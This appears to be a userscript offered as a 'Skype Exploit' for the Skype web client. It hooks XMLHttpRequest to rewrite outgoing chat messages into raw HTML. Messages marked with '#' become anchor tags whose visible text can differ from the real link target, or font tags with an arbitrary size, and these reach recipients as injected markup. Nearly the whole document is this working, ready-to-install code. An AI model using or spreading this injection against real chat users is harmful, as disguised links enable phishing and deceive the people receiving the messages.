Skype Exploit (Save As Userscript)

1. // ==UserScript==
2. // @name SkypeDestroyer
3. // @namespace http://mzinck.com
4. // @version 0.1
5. // @description Skype Script
6. // @author Mitchell Zinck <[email protected]
7. // @include https://web.skype.com/en/
8. // @grant none
9. // ==/UserScript==
10.  
11.  
12. (function(XHR) {
13. "use strict";
14.  
15. var stats = [];
16. var timeoutId = null;
17.  
18. var open = XHR.prototype.open;
19. var send = XHR.prototype.send;
20.  
21. XHR.prototype.open = function(method, url, async, user, pass) {
22. this._url = url;
23. open.call(this, method, url, async, user, pass);
24. };
25.  
26. XHR.prototype.send = function(data) {
27. var k;
28. if(isMsg(data) && data != null) {
29. k = JSON.parse(data);
30. var size = null;
31. if(k.content.indexOf("!") > -1) {
32. size = k.content.match(/\!(.*?)\!/)[1];
33. }
34. if(k.content.substring(0, 1) === "#") {
35. k = replaceURL(k);
36. if(k !== null) {
37. k = JSON.stringify(k);
38. data = k;
39. }
40. if(size !== null) {
41. k = changeFontSize(JSON.parse(data), size);
42. if(k !== null) {
43. k = JSON.stringify(k);
44. data = k;
45. }
46. }
47. }
48.  
49. console.log(data);
50. }
51.  
52. var self = this;
53. var start;
54. var oldOnReadyStateChange;
55. var url = this._url;
56.  
57. function onReadyStateChange() {
58. if(self.readyState == 4 /* complete */) {
59. var time = new Date() - start;
60. stats.push({
61. url: url,
62. duration: time
63. });
64.  
65. if(!timeoutId) {
66. timeoutId = window.setTimeout(function() {
67. var xhr = new XHR();
68. xhr.noIntercept = true;
69. xhr.open("POST", "/clientAjaxStats", true);
70. xhr.setRequestHeader("Content-type","application/json");
71. xhr.send(JSON.stringify({ stats: stats } ));
72.  
73. timeoutId = null;
74. stats = [];
75. }, 2000);
76. }
77. }
78.  
79. if(oldOnReadyStateChange) {
80. oldOnReadyStateChange();
81. }
82. }
83.  
84. if(!this.noIntercept) {
85. start = new Date();
86.  
87. if(this.addEventListener) {
88. this.addEventListener("readystatechange", onReadyStateChange, false);
89. } else {
90. oldOnReadyStateChange = this.onreadystatechange;
91. this.onreadystatechange = onReadyStateChange;
92. }
93. }
94.  
95. send.call(this, data);
96. }
97. })(XMLHttpRequest);
98.  
99. function isMsg(value) {
100. try {
101. JSON.stringify(value);
102. if(JSON.stringify(value).indexOf("content") > -1) {
103. return true;
104. } else {
105. return false;
106. }
107. } catch (ex) {
108. return false;
109. }
110. }
111.  
112. function replaceURL(data) {
113. try {
114. if(data.content.indexOf('<a href="') > -1) {
115. var remove = data.content.match(/\<(.*?)\>/)[1];
116. data.content = data.content.replace(remove, '');
117. data.content = data.content.replace('<', '');
118. data.content = data.content.replace('>', '');
119. data.content = data.content.replace('</a>', '');
120. console.log(data.content);
121. }
122. if(data.content.match(/\[(.*?)\]/)[1].indexOf("http://") == -1 && data.content.match(/\[(.*?)\]/)[1].indexOf("https://") == -1) {
123. data.content = "<a href='http://" + data.content.match(/\[(.*?)\]/)[1] + "'>" + data.content.match(/\(([^)]+)\)/)[1] + "</a>";
124. } else {
125. data.content = "<a href='" + data.content.match(/\[(.*?)\]/)[1] + "'>" + data.content.match(/\(([^)]+)\)/)[1] + "</a>";
126. }
127. return data;
128. } catch(ex) {
129. return null;
130. }
131. }
132.  
133. function changeFontSize(data, size) {
134. try {
135. if(data.content.indexOf("#") > -1) {
136. data.content = data.content.replace('#','');
137. data.content = data.content.replace(data.content.match(/\!(.*?)\!/)[1], '');
138. data.content = data.content.replace(/!/g, '');
139. }
140.  
141. data.content = "<font size='" + size + "'>" + data.content + "</font>";
142. return data;
143. } catch(ex) {
144. return null;
145. }
146. }